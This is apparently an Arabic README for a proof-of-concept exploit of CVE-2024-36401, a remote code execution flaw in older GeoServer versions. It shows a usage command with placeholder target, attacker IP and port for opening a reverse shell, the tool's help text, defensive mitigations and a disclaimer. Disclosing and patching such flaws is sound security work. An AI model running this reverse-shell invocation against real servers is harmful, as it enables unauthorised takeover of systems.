
POC لـ CVE-2024-36401. سيحاول هذا الـ POC إنشاء reverse shell من الأهداف الضعيفة.
POC لـ CVE-2024-36401 GeoServer. سيحاول هذا الـ POC إنشاء قشرة عكسية للنظام من الأهداف.

POC لـ CVE-2024-36401: RCE لإصدارات GeoServer الأقدم من 2.25.1 و2.24.3 و2.23.5. يعتمد هذا الـ POC على النشرة الأمنية من phith0n.
سيحاول هذا الـ POC إنشاء قشرة عكسية من الأهداف الضعيفة. وهو مصمم للعمل ضد أهداف Linux الضعيفة. يجب أن يكون لديك جهاز بعنوان IP منشور ويمكن الوصول إليه لتشغيل هذا الـ POC.
requestsلاستخدام هذا الـ POC ضد هدف واحد:
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
المساعدة:
python3 CVE-2024-36401.py -h
options:
-h, --help show this help message and exit
-u U Target, example https://target:8080
-ip IP Your IP, example 192.168.1.1
-port PORT Port, example 1337
-type TYPE Type, example sf:archsites
1- قم بتعطيل طلبات WFS.
2- قم بتأمين نظام Linux الخاص بك عن طريق تكوين iptables لتعطيل الاتصالات العكسية، وضبط السياسات الافتراضية لإسقاط كل الحركة، والسماح بالاتصالات القائمة وذات الصلة، والسماح فقط بحركة المرور الصادرة الأساسية مثل DNS وHTTP وHTTPS.
3- أو قم بالترقية إلى أحدث إصدار من GeoServer.
لأي اقتراحات أو أفكار، يرجى التواصل معي عبر هذا الرابط.
أحب إنشاء أدواتي الخاصة للمتعة والعمل ولأغراض تعليمية فقط. لا أدعم أو أشجع القرصنة أو الوصول غير المصرح به إلى أي نظام أو شبكة. يرجى استخدام أدواتي بمسؤولية وفقط على الأنظمة التي لديك إذن واضح لاختبارها.